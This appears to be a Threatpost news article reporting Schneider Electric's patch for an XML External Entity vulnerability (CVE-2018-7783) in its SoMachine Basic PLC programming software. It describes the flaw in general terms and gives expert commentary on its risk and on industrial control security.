Schneider Electric on Tuesday issued fixes for a vulnerability in its SoMachine Basic software, which could result in the disclosure and retrieval of arbitrary data.
The software in question is used to develop code for programmable logic controllers. Attackers can leverage a vulnerability within the XML parser tool within SoMachine Basic, and launch an out-of-band remote arbitrary data retrieval attack.
“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique, resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” Schnieder Electric said in a security notice. “The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file.”
Essentially, it means that several versions of SoMachine Basic have sites that accept XML documents as input. When an XML document is received, it needs to be parsed, which means turning it from a text file into structured data.
“The tools out there that do that are called XML parsers, and it turns out that in the XML spec, there’s support for features like adding a header in the doc, enabling the person creating the document to reference external documents or files,” explained Jeff Williams, CTO of Contrast Security, speaking to Threatpost.
Williams said an attacker could create a malicious XML file and upload it to this site, but when the XML parser reads this file, it also reads the malicious header that the attacker added, and attempts to bring in the external resource – which could be reference files on the disk, or other file servers on the networks.
“So an attacker could upload a malicious XML file, [and then] it pulls in resources from the disk, and then the program leaks those details out through the website,” said Williams. “That data could be anything on the internal network – including manufacturing data or personal data. A bigger risk is [the potential for] stealing IP, source code or files related to industrial processes.”
The vulnerability (CVE-2018-7783) was rated a CVSS score of 8.6, which is considered “high,” according to Schneider Electric. However, while the vulnerability may put data at risk, SoMachine Basic is not a production ICS system, but rather in a development environment. As such, it incurs no material downtime and therefore would not have any urgency from a business perspective, according to Tom Parsons, senior director of product management at Tenable.
“The attack requires… user interaction,” he told Threatpost. “The victim would have to actively load/import a malicious file crafted by an attacker. So, it’s not an easy attack to execute, because an attacker can’t just remotely connect to the system and execute the exploit.”
Schneider Electric did not respond to questions from Threatpost including whether there has been an exploit of the vulnerability discovered.
“The cybersecurity team at Schneider Electric has collaborated with Applied Risk to ensure the exploit had been addressed after identification with an effective patch,” a spokesperson at Applied Risk, whose researcher Gjoko Krstikj discovered the vulnerability, told Threatpost.
All versions of SoMachine Basic prior to v1.6 SP1 are impacted by the flaw. The manufacturing company said a fix is available for download online, or by using the Schneider Electric Software Update tool.
Schneider Electric has faced a bevy of vulnerabilities on its systems, including a critical remote code execution vulnerability in two Schneider Electric industrial control-related products in May and a critical vulnerability in its WonderWare Historian last year.
But security experts like Parsons said that industrial vendors, for their part, are becoming more aware of cybersecurity vulnerabilities on their operational technology-related hardware and software.
“Vulnerability types like remote service vulnerabilities are still common in OT systems, while in the IT world these have been displaced by application vulnerabilities,” Parsons told Threatpost. “This reflects that OT has only recently become a target for threat actors. But OT vendors are becoming much more aware and active in addressing vulnerabilities and providing patches, as OT becomes increasingly connected.”